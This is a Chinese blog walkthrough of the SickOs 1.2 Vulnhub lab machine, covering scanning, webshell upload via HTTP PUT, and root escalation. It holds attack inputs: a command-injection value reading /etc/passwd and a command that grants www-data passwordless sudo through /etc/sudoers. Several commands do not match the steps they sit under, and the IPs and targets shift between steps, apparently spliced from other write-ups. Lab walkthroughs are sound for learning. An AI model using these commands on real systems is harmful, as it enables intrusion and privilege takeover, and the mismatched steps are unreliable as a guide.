Vulnhub-靶机-SickOs 1.2

最新推荐文章于 2024-06-28 10:07:42 发布
最新推荐文章于 2024-06-28 10:07:42 发布
阅读量430 收藏
点赞数
分类专栏: Vulnhub-靶机 文章标签: 渗透测试 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43264813/article/details/114394428
版权
本文介绍了一次针对SickOs1.2靶机的渗透测试过程,包括信息收集、漏洞利用及权限提升等关键步骤,最终获取Flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Vulnhub—靶机—SickOs 1.2

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

文章目录

一、信息收集

【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.43.0/24
在这里插入图片描述

【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -T4 -sV -p- 192.168.43.54
在这里插入图片描述

【步骤三】尝试22端口弱口令远程访问
【命令】dirb http://192.168.110.131

【步骤四】访问目标web页面,并进行目录枚举
在这里插入图片描述在这里插入图片描述

【步骤五】访问扫出的页面并查看源码
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
【分析】目标是web版本是lighttpd1.4.28

【步骤六】使用bp抓包查看test目录支持的http方法
【命令】URLIP/sar2HTML/index.php?plot=;cat /etc/passwd

二、漏洞利用

【步骤七】发现致辞put传输方式,进行一句话传输测试
在这里插入图片描述
在这里插入图片描述

【步骤八】使用蚁箭连接
在这里插入图片描述在这里插入图片描述

【步骤九】上传php反弹shell文件
在这里插入图片描述

【步骤十】Kali使用nc监听本地443端口
【命令】echo "php /var/www/html/sar2HTML/sarDATA/uPLOAD/shell.php" >> write.sh
【步骤十一】Shell成功,进行提权,将当前用户加入sudoers列表中,新建一个update文件并添加执行权限
在这里插入图片描述

【步骤十二】给update文件赋权
【命令】echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL)NOPASSWD:ALL” >> /etc/sudoers’ > /tmp/update
在这里插入图片描述
在这里插入图片描述

三、Flag

【步骤十三】前往root目录寻找flag
在这里插入图片描述

Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 1192
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机:Kioptrix_Level1192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
vulnhub---SickOS1.2靶机
qq_43168364的博客
08-22 514
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
Vulnhub靶机 SickOs1.2
菜浪马废的博客
04-25 267
没啥有用的东西 只有一个test 可以用put方式 试了好几个端口4444 1180 1234都不行 换了443可以了 成功提权 就用了一种方法 这有个大佬,写的超级详细 传送门 ...
vulnhub SickOs: 1.2
箭雨镜屋
01-14 2823
渗透思路: nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权
Vulnhub靶机SickOs1.2
qq_48904485的博客
03-21 1010
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机SickOs 1.210.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 1043
记一次Vulnhub-SickOs1.2渗透过程
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2510
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1. Get root!
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
No.13-VulnHub-SickOs: 1.2-Walkthrough渗透学习
qq_34801745的博客
01-11 853
** VulnHub-SickOs: 1.2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ 靶机难度:中级(CTF) 靶机发布日期:2016年4月27日 靶机描述:这是SickOs的后续系列中的第二篇,并且与先前的发行版无关,挑战范围是在系统上获得最高特权。 目标:得到root权限&找到flag.txt 作...
靶机实战-SickOs1.2
滕财然的博客
01-27 599
SickOs1.2靶机实战 文章目录SickOs1.2靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务Getshell方式一Getshell方式二5、提权方式一方式二方法三//这一个方法我没成功,你们可以尝试一下 1、主机发现 arp扫描 目标IP:192.168.232.161 2、端口扫描 目标开放80、22端口 3、端口详细信息扫描 4、访问80端口...
Vulnhub靶机
weixin_43902100的博客
09-21 755
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
13-VulnHub-SickOs 1.2
尼德霍格007
08-04 351
vulnhub-SickOs 1.2 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-4 一、信息收集 nmap扫描靶机ip地址 nmap -sP 192.168.21.0/24 nmap扫描靶机开放的端口 nmap -A -p 1-64000 192.168.21.149 可以看到靶机只开放了22和80端口,访问一下web页面 看了一下页面源码,没啥
vulnhub靶机
weixin_43902100的博客
09-28 338
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
VulnHub靶机-SkyTower
Slow_的博客
02-26 863
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 1017
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
SICKOS 1.2 WALKTHROUGH
weixin_41082546的博客
08-11 423
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 首先获取目标ip地址,并探测端口 netdiscover -i eth0 -r 192.168.88.1/24 访问web,并查看源码,没有什么有用的东西 目录发现 dirbhttp://192.168.88.201 nikto -hhtt...
Vulnhub靶机-PumpkinFestival
最新发布
ergeLXT的博客
06-28 736
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值